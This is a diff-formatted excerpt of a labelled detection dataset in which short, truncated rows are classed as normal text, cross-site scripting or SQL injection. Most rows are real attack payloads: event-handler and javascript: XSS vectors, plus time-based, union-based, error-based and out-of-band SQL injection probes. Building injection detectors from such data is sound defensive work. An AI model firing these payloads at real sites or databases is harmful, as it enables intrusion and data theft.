+"alert;pg(""XSS"")",1,XSS,1166 +Select your combat.,0,normal,24917 +"<figure draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,3398 +"1"" ) ) or 8315 = ( select count ( * ) from sysibm.",2,SQLi,14799 +"When you select print, the default printer is set ",0,normal,25143 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,12763 +"<style>@keyframes slidein {}</style><rp style=""ani",1,XSS,3129 +"><svg/onload=alert(String.fromCharCode(88,83,83))>",1,XSS,9697 +"-3862' ) ) union all select 2495,2495,2495,2495,24",2,SQLi,15141 +"<isindex onclick=""alert(1)"">test</isindex>",1,XSS,8504 +"1"" where 4064 = 4064 and 4241 = convert ( int, ( s",2,SQLi,22256 +Sort cables.,0,normal,23037 +Delete the old messages from your chat.,0,normal,22947 +"1"" ) ) union all select null,null--",2,SQLi,16538 +"<address draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,3590 +"<listing onmouseleave=""alert(1)"">test</listing>",1,XSS,3560 +any,0,normal,23182 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10965 +"-1269' or 1570 = convert ( int, ( select char ( 11",2,SQLi,13007 +1 ) as wvpl where 9791 = 9791 and make_set ( 3491 ,2,SQLi,16711 +1 where 5080 = 5080,2,SQLi,16008 +"<audio onmouseleave=""alert(1)"">test</audio>",1,XSS,5174 +<svg><wbr onload=alert(1)></wbr>,1,XSS,6746 +<fieldset id=x tabindex=1 onactivate=alert(1)></fi,1,XSS,7401 +-6412%' or 4065 = 5815 and '%' = ',2,SQLi,19596 +"AND ELT(1337=1337,SLEEP(5)) AND '1337' LIKE '1337",2,SQLi,11270 +Whether you choose to spend a fortune on dishes or,0,normal,25137 +--></noscript></noembed></template></title></texta,1,XSS,9487 +1' ) ) as yqcl where 5026 = 5026 rlike ( select * ,2,SQLi,13833 +"1' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,18766 +1 ) ) as bebl where 2597 = 2597 ( select ( case wh,2,SQLi,16895 +"1"" where 8697 = 8697 and elt ( 3114 = 3114,sleep (",2,SQLi,13893 +Select a pillow.,0,normal,22804 +1 ) or 8315 = ( select count ( * ) from sysibm.sys,2,SQLi,21046 +"<colgroup onmouseleave=""alert(1)"">test</colgroup>",1,XSS,8180 +"select * from users where id = 1 or "". ) "" or 1 = ",2,SQLi,11623 +"<tt draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,7860 +1'+ ( select 'upmd' where 3438 = 3438,2,SQLi,17488 +Create list.,0,normal,23072 +"<legend onmouseenter=""alert(1)"">test</legend>",1,XSS,2605 +"<spacer onclick=""alert(1)"">test</spacer>",1,XSS,8612 +<legend onblur=alert(1) tabindex=1 id=x></legend><,1,XSS,8064 +"<svg onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,3253 +1' ) as bihs where 4197 = 4197,2,SQLi,12604 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,15860 "<x style=""background:url('x&#1;;color:red;/*')"">XX",1,XSS,710 "<input type=""file"" id=""fileInput"" /><script>const ",1,XSS,119 -HAVING 1=0--,2,SQLi,10215 -"<br onmousemove=""alert(1)"">test</br>",1,XSS,4599 -<small id=x tabindex=1 onactivate=alert(1)></small,1,XSS,2043 -"/?param=<data:text/html;base64,PHNjcmlwdD5hbGVydCg",1,XSS,7420 -"<nav onmouseout=""alert(1)"">test</nav>",1,XSS,6131 -"1"" ) as dien where 4022 = 4022",2,SQLi,17887 +AND 1=1--,2,SQLi,10217 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4601 +<video id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,2044 +<style>:target {color:red;}</style><mark id=x styl,1,XSS,7422 +<option id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,6133 +"-1083%"" ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ",2,SQLi,17889 "<Img src = x onerror = ""javascript: window.onerror",1,XSS,318 -"UNION ALL SELECT 1,2,3,4,5--",2,SQLi,10567 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5316 -Search for data where required.,0,normal,23465 -1'+ ( select yfuu where 1717 = 1717 union all sele,2,SQLi,14458 -"1' in boolean mode ) union all select null,null--",2,SQLi,13420 -"end and ""xouo"" like ""xouo",2,SQLi,12874 -1 ) ) as xebl where 3105 = 3105 or 8421 = ( select,2,SQLi,14994 -"<acronym oncut=""alert(1)"" contenteditable>test</ac",1,XSS,6524 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5740 -"The speaker, instead of deciding the question, sub",0,normal,25371 -"-3445 union all select 5505,5505,5505--",2,SQLi,14954 -<del onpointerup=alert(1)>XSS</del>,1,XSS,5471 -select ( case when ( 8808 = 1367 ) then 1 else 880,2,SQLi,14337 -"1 where 1326 = 1326 union all select null,null,nul",2,SQLi,16472 -"<details onpaste=""alert(1)"" contenteditable>test</",1,XSS,4164 -select ( case when ( 4043 = 5276 ) then 4043 else ,2,SQLi,19767 -1%' or ( select 2* ( if ( ( select * from ( select,2,SQLi,13181 +"UNION ALL SELECT 1,2,3,4,5,6,7--",2,SQLi,10569 +"<u onkeyup=""alert(1)"" contenteditable>test</u>",1,XSS,5318 +Where to add new data?,0,normal,23462 +1' ) and exp ( ~ ( select * from ( select concat (,2,SQLi,14460 +select ( case when ( 7019 = 1998 ) then 7019 else ,2,SQLi,13422 +1' where 7036 = 7036,2,SQLi,12876 +1' ) ) ) and sleep ( 5 ) and ( ( ( 'hwjy' = 'hwjy,2,SQLi,14996 +"<rb onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,6526 +<q onpointerdown=alert(1)>XSS</q>,1,XSS,5742 +The struggle was thus renewed on the old ground of,0,normal,25368 +1' ) ) and 3580 = ( select count ( * ) from domain,2,SQLi,14956 +document.write(),1,XSS,5473 +"1%' union all select null,null,null,null,null,null",2,SQLi,14339 +-2889 ) ) as iqzv where 1786 = 1786 union all sele,2,SQLi,16474 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4166 +"-3555' ) or make_set ( 9354 = 9354,7185 ) and ( 'p",2,SQLi,19769 +"-6523"" or 4144 = ( select upper ( xmltype ( chr ( ",2,SQLi,13183 "<body onMouseMove body onMouseMove=""javascript:jav",1,XSS,404 -"<header draggable=""true"" ondragend=""alert(1)"">test",1,XSS,4912 -or 1 = 1--,2,SQLi,11423 -"<xsl:stylesheet id=""stylesheet"" version=""1.0"" xmln",1,XSS,9366 -Filter rows where required.,0,normal,23250 -"<table onpaste=""alert(1)"" contenteditable>test</ta",1,XSS,6379 -1'+ ( select dklj where 3265 = 3265,2,SQLi,18626 -1' ) ) ) and ( select 2* ( if ( ( select * from ( ,2,SQLi,14745 -<style>:target {color: red;}</style><optgroup id=x,1,XSS,3540 -"<keygen onmouseup=""alert(1)"">test</keygen>",1,XSS,6311 -"<input type=""text"" value=``<div/onmouseover='alert",1,XSS,9220 -"<progress oncopy=""alert(1)"" contenteditable>test</",1,XSS,5518 -1'|| ( select 'jjpy' from dual where 6295 = 6295,2,SQLi,18821 -"<track onkeydown=""alert(1)"" contenteditable>test</",1,XSS,2595 -"Destined originally for the Church, he had preferr",0,normal,26241 -select ( case when ( 6047 = 8897 ) then 6047 else ,2,SQLi,20401 --3880 ) or 4144 = ( select upper ( xmltype ( chr (,2,SQLi,22072 -"-6236' ) ) ) or 1 group by concat ( 0x7171706a71, ",2,SQLi,22245 -<a onpointerout=alert(1)>XSS</a>,1,XSS,6655 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,14267 --6449' ) ) or 2590 = 2848,2,SQLi,15868 -"-8419 ) where 8692 = 8692 union all select 8692,86",2,SQLi,17810 +"<nobr onmousemove=""alert(1)"">test</nobr>",1,XSS,4914 +"select * from users where id = 1 or "",#"" or 1 = 1 ",2,SQLi,11425 +Garethy Salty Method!<script>alert(Components.look,1,XSS,9368 +Specify filters where applicable.,0,normal,23247 +"<ol onmousedown=""alert(1)"">test</ol>",1,XSS,6381 +"1' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ",2,SQLi,18628 +begin if ( 5624 = 5624 ) then dbms_lock.sleep ( 5 ,2,SQLi,14747 +"<image oncontextmenu=""alert(1)"">test</image>",1,XSS,3542 +"<ol onmouseleave=""alert(1)"">test</ol>",1,XSS,6313 +<isindex formaction=javascript:alert(1) type=submi,1,XSS,9222 +<tr id=x tabindex=1 onbeforeactivate=alert(1)></tr,1,XSS,5520 +1' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +c,2,SQLi,18823 +<noframes onpointerover=alert(1)>XSS</noframes>,1,XSS,2596 +"Dim sum plates and tea are brought around by cart,",0,normal,26238 +1'|| ( select 'lzvb' where 1637 = 1637 union all s,2,SQLi,20399 +waitfor delay '0:0:5' and ( ( '%' = ',2,SQLi,22070 +1' ) and 6537 = dbms_pipe.receive_message ( chr ( ,2,SQLi,22243 +"<small onclick=""alert(1)"">test</small>",1,XSS,6657 +"-9688%' ) ) ) or elt ( 3695 = 7995,7995 ) and ( ( ",2,SQLi,14269 +-1252' ) or 4747 = dbms_utility.sqlid_to_sqlhash (,2,SQLi,15870 +"1"" ) union all select null,null,null,null,null,nul",2,SQLi,17812 "{""id"":null,""firstName"":""Johnnie"",""lastName"":""Seah""",0,normal,27431 --1011 or 7140 = 9977--,2,SQLi,21697 -"<table><TD BACKGROUND=""javascript:document.vulnera",1,XSS,1503 -"Select cuts jumped $2.27 to $217.93, based on USDA",0,normal,25631 +1' ) ) or exp ( ~ ( select * from ( select concat ,2,SQLi,21695 +"<div STYLE=""background-image: url(javascript:docum",1,XSS,1504 +"Select from steak, seafood, chicken or enjoy fresh",0,normal,25628 "<img src=x onerror=\x10""javascript:alert(1)"">",1,XSS,679 -Let's decide where to travel for our vacation.,0,normal,23913 -<style>:target {color: red;}</style><bgsound id=x ,1,XSS,5852 -"<abbr oncopy=""alert(1)"" contenteditable>test</abbr",1,XSS,7195 -1' and ( 3423 = 7789 ) *7789 and 'pdia' like 'pdia,2,SQLi,16302 -x' AND email IS NULL; --,2,SQLi,10096 -<svg><code onload=alert(1)></code>,1,XSS,2940 --7859 ) as ipdg where 4413 = 4413 or 9323 = 9323#,2,SQLi,12391 -<video onpointermove=alert(1)>XSS</video>,1,XSS,1851 -&#x03c,1,XSS,1071 -"1%"" ) and row ( 6237,7469 ) > ( select count ( * )",2,SQLi,17930 -"<applet onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,6785 -"1"" and updatexml ( 3393,concat ( 0x2e,0x7171706a71",2,SQLi,14445 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10673 -Transplant strong plants of biennials and perennia,0,normal,25235 -"<bgsound ondblclick=""alert(1)"">test</bgsound>",1,XSS,3393 -"1%' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr",2,SQLi,17484 -Randomly select a wedding theme.,0,normal,24390 -"1"" waitfor delay '0:0:5'--",2,SQLi,16803 -Select plot.,0,normal,24747 -1' ) ) as fbjd where 8597 = 8597,2,SQLi,21290 -having 1=1--,2,SQLi,10140 -"1%"" ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x69",2,SQLi,14607 -Select a skin care routine to follow.,0,normal,24010 -<shadow id=x tabindex=1 onactivate=alert(1)></shad,1,XSS,8401 -"1"" ) where 3958 = 3958 or 6979 = like ( 'abcdefg',",2,SQLi,20480 -"<style onmousedown=""alert(1)"">test</style>",1,XSS,4894 -"<li draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,8721 -Insert card.,0,normal,23021 -"1 ) ) or 6979 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,17107 -waitfor delay '0:0:5' and 'fjpf' like 'fjpf,2,SQLi,18245 -"That's why we have elections, why we democraticall",0,normal,25488 -"{""id"":null,""name"":""reason""}",0,normal,27020 -"<command oncopy=""alert(1)"" contenteditable>test</c",1,XSS,8499 -"1' ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ",2,SQLi,18628 -"1' ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ",2,SQLi,18377 -1 ) and 3861 = 5813--,2,SQLi,19160 -Select your ideal location.,0,normal,24473 -1 ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ),2,SQLi,16588 --6616 ) order by 1--,2,SQLi,21266 -"<header onkeyup=""alert(1)"" contenteditable>test</h",1,XSS,6118 -1%' ) and 9226 = 7542--,2,SQLi,19844 -1'+ ( select 'idmr' where 5029 = 5029 union all se,2,SQLi,12717 -<rb onpointerup=alert(1)>XSS</rb>,1,XSS,6568 -"<details oncontextmenu=""alert(1)"">test</details>",1,XSS,5671 -Select decide.,0,normal,24564 -<details onpointerover=alert(1)>XSS</details>,1,XSS,8950 -"1"" ) and ( select * from ( select ( sleep ( 5 ) ) ",2,SQLi,13331 +I'm considering where to attend a seminar.,0,normal,23910 +<data id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,5854 +"<sup onkeyup=""alert(1)"" contenteditable>test</sup>",1,XSS,7197 +1'|| ( select 'kbvq' where 9279 = 9279 and extract,2,SQLi,16304 +or 'unusual' = 'unusual',2,SQLi,10098 +<shadow onpointerout=alert(1)>XSS</shadow>,1,XSS,2941 +1 ) where 5774 = 5774,2,SQLi,12393 +"<center draggable=""true"" ondrag=""alert(1)"">test</c",1,XSS,1852 +&#x003c,1,XSS,1072 +1 waitfor delay '0:0:5'# opyp,2,SQLi,17932 +"<spacer onmousedown=""alert(1)"">test</spacer>",1,XSS,6787 +"-7460"" union all select 4273,4273,4273,4273,4273,4",2,SQLi,14447 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMA",2,SQLi,10675 +Twitter's new app will be available in select mark,0,normal,25232 +"<input onbeforepaste=alert(1) value="""" autofocus>",1,XSS,3395 +"1"" where 9632 = 9632 and row ( 6237,7469 ) > ( sel",2,SQLi,17486 +Select your dream wedding makeup.,0,normal,24387 +1'+ ( select uzan where 4312 = 4312 and make_set (,2,SQLi,16805 +"1"" ) ) and elt ( 4249 = 4249,7259 ) and ( ( ""abcm""",2,SQLi,21990 +-9953'|| ( select 'zljk' where 2886 = 2886 union a,2,SQLi,21288 +x' AND userid IS NULL; --,2,SQLi,10142 +1' or ( select * from ( select ( sleep ( 5 ) ) ) s,2,SQLi,14609 +Insert the fresh cartridge into the printer.,0,normal,22956 +"<kbd onkeyup=""alert(1)"" contenteditable>test</kbd>",1,XSS,8403 +"-8981%"" ) ) ) union all select 4538,4538,4538,4538",2,SQLi,20478 +"<noframes onmousemove=""alert(1)"">test</noframes>",1,XSS,4896 +"<img onkeypress=""alert(1)"" contenteditable>test</i",1,XSS,8723 +Create memories.,0,normal,23018 +"1%"" ) and 9198 = 9198--",2,SQLi,17109 +"1"" where 3434 = 3434",2,SQLi,18247 +select a new person to honor.,0,normal,25658 +"{""id"":null,""firstName"":""Ab"",""lastName"":""Rahim"",""ad",0,normal,27017 +"<rt onkeydown=""alert(1)"" contenteditable>test</rt>",1,XSS,8501 +select pg_sleep ( 5 ) and ( ( ( 9476 = 9476,2,SQLi,18630 +-3059' ) as jhbh where 4056 = 4056 or ( 3498 = 696,2,SQLi,18379 +1' where 8537 = 8537 and 3754 = ( select upper ( x,2,SQLi,19162 +I'll select the soundtrack.,0,normal,24470 +"1' union all select null,null,null,null,null,null#",2,SQLi,16590 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,21264 +"<map onmouseover=""alert(1)"">test</map>",1,XSS,6120 +"-7258 or 1 group by concat ( 0x7171706a71, ( selec",2,SQLi,19846 +"-4588"" union all select 4550,4550,4550,4550#",2,SQLi,12719 +<big onpointerout=alert(1)>XSS</big>,1,XSS,6570 +<basefont onpointermove=alert(1)>XSS</basefont>,1,XSS,5673 +Select get.,0,normal,24561 +<img onpointerenter=alert(1)>XSS</img>,1,XSS,8952 +1' ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ,2,SQLi,13333 `'><script>\xE2\x80\xAFjavascript:alert(1)</script,1,XSS,575 -Select teach.,0,normal,24712 -Select a recipe to cook for dinner.,0,normal,24074 -Select substitute.,0,normal,24760 -1'|| ( select 'bqhi' from dual where 7409 = 7409,2,SQLi,15124 -"-8133' ) union all select 6417,6417,6417,6417,6417",2,SQLi,16699 -Select dim.,0,normal,24681 -Dan Nathan is a seller of Financial Select Sector ,0,normal,26250 -"<track onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,8696 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13",2,SQLi,10515 -Modify the text.,0,normal,22838 -1'|| ( select 'uvbb' where 7795 = 7795 or char ( 1,2,SQLi,17233 -"<base onmousemove=""alert(1)"">test</base>",1,XSS,2249 -1'|| ( select 'cozi' from dual where 2607 = 2607 a,2,SQLi,15959 -"<wbr onmouseup=""alert(1)"">test</wbr>",1,XSS,5617 -"Finally, select that you're interested in dry ice ",0,normal,26196 --8924 ) ) as jybr where 7901 = 7901 or elt ( 1032 ,2,SQLi,13510 -"The update is slated for this spring, and it shoul",0,normal,25362 -1%' ) ) and 6414 = ( select count ( * ) from rdb$f,2,SQLi,14391 +Select flight.,0,normal,24709 +Select a wine to pair with the meal.,0,normal,24071 +Select switch.,0,normal,24757 +"-1418"" ) where 7528 = 7528 order by 1#",2,SQLi,15126 +1 ) as wuio where 5312 = 5312 or 7552 = ( select c,2,SQLi,16701 +Select shine.,0,normal,24678 +David Seaburg was a buyer of the Energy Select Sec,0,normal,26247 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8698 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10517 +Insert the card.,0,normal,22835 +select ( case when ( 1005 = 5996 ) then 1 else 100,2,SQLi,17235 +<frameset id=x tabindex=1 onfocusin=alert(1)></fra,1,XSS,2250 +1' ) ( select ( case when ( 5451 = 5451 ) then reg,2,SQLi,15961 +"<ul draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,5619 +"Find out how to prevent slow punctures, select tir",0,normal,26193 +"1"" or ( select 2* ( if ( ( select * from ( select ",2,SQLi,13512 +The View Mother Wavelet option can be used to sele,0,normal,25359 +"1"" ) where 6956 = 6956 or 8315 = ( select count ( ",2,SQLi,14393 "&lt;FRAMESET&gt;&lt;FRAME SRC=\""javascript&#058;al",1,XSS,998 -"1"" ) ) ) procedure analyse ( extractvalue ( 9255,c",2,SQLi,12927 -"select * from users where id = 1 or "",,"" = 1 or 1 ",2,SQLi,11587 -1 where 4519 = 4519,2,SQLi,16936 -Select your weapon.,0,normal,24825 -"1%' ) ) procedure analyse ( extractvalue ( 5840,co",2,SQLi,19882 -"-4400 union all select 3983,3983,3983,3983,3983,39",2,SQLi,17795 -1' rlike sleep ( 5 ) and 'gtfo' = 'gtfo,2,SQLi,14573 -<textarea onpointerup=alert(1)>XSS</textarea>,1,XSS,8033 -&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;htt,1,XSS,1408 -The service is only available for select clients a,0,normal,25377 -Carefully select options.,0,normal,24416 -"-3737%"" union all select 4452,4452,4452#",2,SQLi,14022 -"1, ( select * from generate_series ( 5609,5609,cas",2,SQLi,14255 -"1"" ) ) as tfjh where 1134 = 1134 and 8635 = ( sele",2,SQLi,13842 -Order a tasty dessert.,0,normal,22569 -"x' AND email IS NULL, --",2,SQLi,11781 -"-8654' union all select 7190,7190,7190,7190,7190#",2,SQLi,22143 +-7864 or 4493 = utl_inaddr.get_host_address ( chr ,2,SQLi,12929 +"select * from users where id = 1 or 1#""? union sel",2,SQLi,11589 +"1"" ) where 2496 = 2496",2,SQLi,16938 +Select your think.,0,normal,24971 +"-8245"" ) ) or 3038 = 3038",2,SQLi,19884 +1' ) ) and 6510 = ( select count ( * ) from sysuse,2,SQLi,17797 +1 ) as sdnd where 9472 = 9472,2,SQLi,14575 +<base onpointermove=alert(1)>XSS</base>,1,XSS,8035 +&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.,1,XSS,1409 +The site has an option to select Portrait Photogra,0,normal,25374 +She'll select her bridesmaids' dresses.,0,normal,24413 +"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,14024 +"1' ) ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( ch",2,SQLi,14257 +( select 2* ( if ( ( select * from ( select concat,2,SQLi,13844 +Insert your contact details.,0,normal,22566 +select * from users where id = '1' union select nu,2,SQLi,11783 +join,0,normal,23114 "<a style=""-o-link:'javascript:javascript:alert(1)'",1,XSS,694 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10726 -<audio id=x tabindex=1 ondeactivate=alert(1)></aud,1,XSS,3444 -"<form><button formaction=""javascript:alert(1)"">",1,XSS,9175 -"<isindex onkeypress=""alert(1)"" contenteditable>tes",1,XSS,4176 --2050' union all select 5606#,2,SQLi,13845 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10459 -Where's the SQL query?,0,normal,23436 -1' in boolean mode ) and 3824 = benchmark ( 500000,2,SQLi,13383 -1 ) where 9149 = 9149 and char ( 120 ) ||char ( 10,2,SQLi,16646 -select * from users where id = 1.<@. or 1 = 1 -- 1,2,SQLi,11530 -"{""id"":null,""name"":""Chatot""}",0,normal,27118 -"<blink ondblclick=""alert(1)"">test</blink>",1,XSS,5498 -<bdi id=x tabindex=1 onfocus=alert(1)></bdi>,1,XSS,3876 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3627 --1643' where 1968 = 1968 or 3484 = 6642,2,SQLi,21654 -select case when 5894 = 4052 then 1 else null end-,2,SQLi,16830 -<html id=x tabindex=1 onfocus=alert(1)></html>,1,XSS,6753 -"<label onkeypress=""alert(1)"" contenteditable>test<",1,XSS,5112 -"1, ( select upper ( xmltype ( chr ( 60 ) ||chr ( 5",2,SQLi,14158 -1' ) or ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,16013 -<head onpointerdown=alert(1)>XSS</head>,1,XSS,3556 -"benchmark(50000000,MD5(1))#",2,SQLi,10387 -"1"" ) ) as qrrx where 4633 = 4633 and 9660 = ( sele",2,SQLi,19752 -Update your phone's software.,0,normal,22561 -1' and non_existant_table = '1,2,SQLi,11060 -"<content onkeydown=""alert(1)"" contenteditable>test",1,XSS,2527 -1 ) as dqda where 1624 = 1624 and 8635 = ( select ,2,SQLi,15033 -Select from the list of available skins the one yo,0,normal,25627 -Merge the records.,0,normal,22785 -<scr<script>ipt>alert(1)</scr</script>ipt><scr<scr,1,XSS,1169 -1'+ ( select 'fqkk' where 9725 = 9725,2,SQLi,16137 -<aside id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,7893 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3150 -select * from users where id = '1' union select ( ,2,SQLi,12007 -"-9820"" or 1038 = 7502#",2,SQLi,17265 -"-3205"" ) union all select 5233,5233,5233,5233#",2,SQLi,19123 -1'+ ( select 'rsgi' where 2258 = 2258,2,SQLi,13440 -&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&,1,XSS,1468 -<col onpointerdown=alert(1)>XSS</col>,1,XSS,8155 -I wonder where my favorite book went.,0,normal,23667 -"-6803"" ) order by 1#",2,SQLi,13834 -"select pg_sleep ( 5 ) and ( ""%"" = """,2,SQLi,12154 -"-6249' ) ) ) union all select 5136,5136,5136,5136,",2,SQLi,16837 -Some adult individuals believe that a gift card me,0,normal,25535 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4138 -1%' ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) |,2,SQLi,19424 -Join the language class for a new skill.,0,normal,22960 -<rt onfocusout=alert(1) tabindex=1 id=x></rt><inpu,1,XSS,4151 -"<center onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,6469 -1' ) where 9951 = 9951 ( select ( case when ( 4587,2,SQLi,14018 -1%' ) ) and 7989 = 3457,2,SQLi,16964 -<details id=x tabindex=1 onfocusin=alert(1)></deta,1,XSS,6572 --3578' ) ) ) order by 1--,2,SQLi,15367 -Where's the perfect spot for a scenic drive?,0,normal,23739 -"-2033"" ) or 1 group by concat ( 0x7171706a71, ( se",2,SQLi,22436 -"1"" ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ",2,SQLi,15156 -"-4838' ) ) or 1 group by concat ( 0x7171706a71, ( ",2,SQLi,13780 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10728 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3446 +<form><input formaction=javascript:alert(1) type=i,1,XSS,9177 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4178 +"-2256"" ) ) ) or 1971 = 4537#",2,SQLi,13847 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10461 +Where's your SQL goal?,0,normal,23433 +1'+ ( select sfmz where 4870 = 4870 or char ( 75 ),2,SQLi,13385 +1'|| ( select 'hlxd' from dual where 2615 = 2615 a,2,SQLi,16648 +select * from users where id = 1<@.. union select ,2,SQLi,11532 +"{""id"":null,""firstName"":""Lhq"",""lastName"":""Totheq"",""",0,normal,27116 +"<big onpaste=""alert(1)"" contenteditable>test</big>",1,XSS,5500 +"<font draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,3878 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3629 +end and 'hizd' = 'hizd,2,SQLi,21652 +"1%"" ) and make_set ( 9956 = 1060,1060 ) and ( ""%"" ",2,SQLi,16832 +"<iframe onmouseout=""alert(1)"">test</iframe>",1,XSS,6755 +<object data=/ onload=alert(1)>,1,XSS,5114 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,14160 +1' ) ) rlike sleep ( 5 ) and ( ( 'qitl' like 'qitl,2,SQLi,16015 +"<span onmouseup=""alert(1)"">test</span>",1,XSS,3558 +"or benchmark(50000000,MD5(1))--",2,SQLi,10389 +1'+ ( select lgkd where 7801 = 7801 and elt ( 4249,2,SQLi,19754 +Insert the car key.,0,normal,22558 +1 and ascii(lower(substring((select top 1 name fro,2,SQLi,11062 +<style>:target {color: red;}</style><basefont id=x,1,XSS,2528 +1' ) where 8776 = 8776 and 6969 = ( select 6969 fr,2,SQLi,15035 +"{""id"":null,""name"":""Hitmonchan""}",0,normal,26821 +Sort the cables.,0,normal,22782 +"<a href=""data:text/html;base64,PHNjcmlwdD5hbGVydCg",1,XSS,1170 +"1"" ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,16139 +<frame id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,7895 +"<nobr onpaste=""alert(1)"" contenteditable>test</nob",1,XSS,3152 +AND 1 = utl_inaddr.get_host_address ( ( SELECT COU,2,SQLi,12009 +1'+ ( select 'usoq' where 7783 = 7783 and updatexm,2,SQLi,17267 +"1"" ) ) and 3707 = ( select count ( * ) from sysibm",2,SQLi,19125 +-4785' or ( 8459 = 8459 ) *4906 and 'esfn' = 'esfn,2,SQLi,13442 +&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&,1,XSS,1469 +"<canvas oncopy=""alert(1)"" contenteditable>test</ca",1,XSS,8157 +Where's the psychotherapist?,0,normal,23664 +"-7409"" ) ) union all select 3145,3145,3145--",2,SQLi,13836 +-8153' ) as qhlb where 4948 = 4948 union all selec,2,SQLi,12156 +1' ) where 1625 = 1625 and 3707 = ( select count (,2,SQLi,16839 +Some parameters offer a selection from a menu to w,0,normal,25532 +"<nav oncontextmenu=""alert(1)"">test</nav>",1,XSS,4140 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,19426 +Sort the colored beads into patterns.,0,normal,22957 +"<option draggable=""true"" ondrag=""alert(1)"">test</o",1,XSS,4153 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6471 +1' ) ) as icik where 1440 = 1440 and 8189 = ( sele,2,SQLi,14020 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,16966 +<header id=x tabindex=1 ondeactivate=alert(1)></he,1,XSS,6574 +"select sleep ( 5 ) and ( ""tlbj"" like ""tlbj",2,SQLi,15369 +Can you help me choose where to dine tonight?,0,normal,23736 +1' ) as chla where 6098 = 6098,2,SQLi,22433 +"-6492' ) union all select 7204,7204--",2,SQLi,15158 +1' ) ) ) and sleep ( 5 ) #,2,SQLi,13782 <marquee onstart='javascript:alert&#x28;1&#x29;'>^,1,XSS,868 -"{""id"":null,""name"":""sets""}",0,normal,26818 -I'm considering where to go for a jog.,0,normal,23669 +"{""id"":null,""firstName"":""Xie"",""lastName"":""Jinhuang""",0,normal,26815 +Where's the addiction counselor,0,normal,23666 "<html onMouseOut html onMouseOut=""javascript:javas",1,XSS,403 -"<style>@keyframes slidein {}</style><area style=""a",1,XSS,4429 -<svg><plaintext onload=alert(1)></plaintext>,1,XSS,3058 -To aid in the speedy dispatch of your order please,0,normal,25283 -<button id=x tabindex=1 ondeactivate=alert(1)></bu,1,XSS,7061 -1' ) ) ) or 7552 = ( select count ( * ) from rdb$f,2,SQLi,16549 -"-8988"" ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( c",2,SQLi,14864 -pg_SLEEP(5),2,SQLi,10391 -;sleep 5--,2,SQLi,11348 -1'|| ( select 'bnaz' from dual where 7168 = 7168 a,2,SQLi,12213 -"<style>@keyframes x{}</style><meter style=""animati",1,XSS,3318 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,12119 -<table onfocusout=alert(1) tabindex=1 id=x></table,1,XSS,7866 -"1 ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a",2,SQLi,12127 